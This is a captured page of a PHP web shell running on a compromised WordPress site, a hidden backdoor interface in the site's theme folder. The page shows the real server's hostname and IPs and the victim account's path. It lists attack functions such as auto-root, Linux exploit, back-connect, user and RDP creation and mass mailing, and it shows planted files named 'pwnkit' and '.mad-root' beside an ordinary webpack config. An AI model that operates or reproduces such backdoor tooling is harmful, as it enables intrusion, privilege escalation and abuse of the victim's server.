Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.16 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
7.4.33
dottorr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
dottorr /
www /
wp-content /
themes /
oceanwp /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
partials
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tribe-events
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
4.56
KB
-rw-r--r--
500.php
211
B
-rw-r--r--
README.md
1.84
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
babel.config.js
42
B
-rw-r--r--
changelog.md
3.95
KB
-rw-r--r--
comments.php
5.1
KB
-rw-r--r--
footer-pwa.php
166
B
-rw-r--r--
footer.php
1.59
KB
-rw-r--r--
functions.php
35.53
KB
-rw-r--r--
header-pwa.php
437
B
-rw-r--r--
header.php
1.01
KB
-rw-r--r--
image.php
1.38
KB
-rw-r--r--
index.php
3.06
KB
-rw-r--r--
offline.php
210
B
-rw-r--r--
page.php
1.26
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
6.39
KB
-rw-r--r--
rtl.css
16.97
KB
-rw-r--r--
screenshot.png
82.88
KB
-rw-r--r--
search.php
1.46
KB
-rw-r--r--
searchform.php
1.05
KB
-rw-r--r--
sidebar-left.php
737
B
-rw-r--r--
sidebar.php
872
B
-rw-r--r--
singular.php
1.65
KB
-rw-r--r--
style.css
2.09
KB
-rw-r--r--
webpack.config.js
2.15
KB
-rw-r--r--
wpml-config.xml
2.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : webpack.config.js
const path = require('path'); const MiniCssExtractPlugin = require('mini-css-extract-plugin'); // const CopyPlugin = require("copy-webpack-plugin"); const ImageminPlugin = require('imagemin-webpack-plugin').default; const TerserPlugin = require('terser-webpack-plugin'); module.exports = { mode: 'production', // optimization: { // minimize: true, // minimizer: [new TerserPlugin({ /* additional options here */ })], // }, entry: { 'inc/customizer/assets/js/customize-search': path.resolve( process.cwd(), 'inc/customizer/assets/src/js/customize-search.js' ), }, output: { filename: '[name].js', path: path.resolve(process.cwd()), publicPath: './', }, module: { rules: [ { test: /\.js$/, exclude: /node_modules/, use: { loader: 'babel-loader', }, }, { test: /\.(jp?g|png|svg)$/, loader: 'url-loader', }, { test: /\.(woff(2)?|ttf|eot|svg)(\?v=\d+\.\d+\.\d+)?$/, use: [ { loader: 'file-loader', options: { name: '[name].[ext]', outputPath: './assets/dist/fonts/', publicPath: './fonts/', } } ] }, { test: /\.s[ac]ss$/i, use: [{ loader: MiniCssExtractPlugin.loader }, { loader: 'css-loader' }, { loader: 'sass-loader', options: { additionalData: "@import 'node_modules/bootstrap/scss/functions';@import 'node_modules/bootstrap/scss/variables';@import 'node_modules/bootstrap/scss/mixins';" } }, ], }, { test: /\.css$/, use: ['style-loader', 'css-loader'], }, ], }, resolve: { extensions: ['.js', '.jsx'], }, externals: { jquery: 'jQuery', lodash: 'lodash', // Necessary for wp.media script. '@wordpress/i18n': 'wp.i18n', }, plugins: [ new MiniCssExtractPlugin({ // Options similar to the same options in webpackOptions.output // both options are optional filename: '[name].css', chunkFilename: '[id].css', }), // new CopyPlugin({ // patterns: [ { // from: "./assets/src/img", // to: "./assets/dist/img", // } ], // }), new ImageminPlugin({ test: /\.(jpe?g|png|gif|svg)$/i, pngquant: { quality: '9' }, }) ], };
Close